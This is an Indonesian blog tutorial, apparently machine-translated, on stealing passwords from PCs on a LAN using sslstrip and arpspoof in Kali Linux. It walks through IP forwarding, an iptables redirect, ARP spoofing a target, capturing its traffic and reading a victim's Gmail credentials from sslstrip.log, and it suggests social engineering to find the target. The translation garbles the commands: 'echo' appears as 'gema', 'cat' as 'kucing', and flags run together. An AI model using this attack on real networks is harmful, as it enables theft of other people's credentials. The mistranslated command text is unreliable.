15/10/2014

Dalam tutorial ini kita akan menggunakan sslstrip untuk mencuri password dari setiap PC yang terhubung dalam LAN.
 SSLStrip dasarnya membajak lalu lintas HTTP. Sekarang hari sedikit sulit untuk mencuri password dari beberapa situs.

1. Bagaimana membuka
A. Metode GUI 
Aplikasi → Kali Linux → Pengumpulan informasi → Analisis → SSL sslstrip
(Klik pada gambar untuk tampilan besar)

B. Buka terminal ketik sslstrip-h Perintah ini akan membuka sslstrip dengan bantuan opsi

Sebelum memulai sslstrip kita perlu melakukan beberapa karya lain untuk menangkap target kami
a. IP forwarding
b. IP Tables untuk redirect 80-8080
c. Menemukan Gateway IP
d. Menemukan Sasaran IP
e. Arpspoof

2. Perintah ini digunakan untuk mengaktifkan IP forwarding.
Sintaks - gema '1 '> / proc/sys/net/ipv4/ip_forward

3. Perintah ini digunakan untuk mengarahkan permintaan dari port 80 ke port 8080 untuk memastikan koneksi keluar kita (dari SSL Jalur) bisa diteruskan ke port yang tepat.
Sintaks - iptables-t nat-A PREROUTING-p tcp-destination-port 80-j REDIRECT-to-port 8080

4. Perintah ini digunakan untuk mengetahui IP gateway.
Sintaks - netstat-nr

5. Ini kami Sasaran OS Windows XP, dengan menggunakan ipconfig kami mendapat IP sasaran. Aku tahu kau berpikir jika saya ingin jebakan diketahui LAN PC maka bagaimana kita akan mencari tahu alamat IP. Nah yang tidak lebih sulit beberapa rekayasa sosial dapat melakukan pekerjaan Anda. Datang ke titik di sslstrip tutorial. Jadi mencatat IP sasaran.

6. Perintah ini digunakan untuk mengarahkan ulang seluruh lalu lintas jaringan HTTP melalui komputer kita menggunakan ARPSpoof (jangan lupa untuk mengaktifkan IP forwarding sebelum ini)
Sintaks - arpspoof-i interface-t IP target-r gerbang Ip
Ex - arpspoof-i eth0-t 192.168.71.128-r 192.168.71.2

7. Sekarang kita perlu membuka terminal baru karena terminal ini berjalan arpspoof dan kita tidak bisa menghentikannya sekarang.

8. Dalam penggunaan terminal baru perintah ini, perintah ini digunakan untuk port mendengarkan. "-L" memberitahu sistem untuk mendengarkan pada port tertentu.
Sintaks - sslstrip-l 8080

9. Sekarang datang ke target OS dan membuka www.gmail.com dan masukkan username dan password Anda daripada klik pada tanda masuk Its normal seperti kita gunakan untuk memeriksa gmail kami.

10. Setelah mengklik masuk target os datang ke penyerang PC (Kali Linux). Anda akan melihat beberapa data capture sslstrip setelah menyelesaikan penangkapan tekan ctrl + C untuk menghentikan sslstrip. Data secara otomatis menyimpan dalam sebuah file bernama sslstrip.log.


11. Berikut menggunakan perintah ls sehingga Anda dapat melihat file yang disimpan sebagai sslstrip.log.

12. Menggunakan cat dan membuka file sslstrip.log Anda dan perhatikanlah. Hmm ada Anda id email korban dan password seperti yang ditunjukkan pada gambar.
Sintaks - kucing sslstrip.log


Semua dalam satu (melakukan seperti ini)
(Klik pada gambar untuk tampilan besar)

0 comments:

Post a Comment

Recent Posts

Total Pageviews

Breaking

About Me

Popular Posts

Blog Archive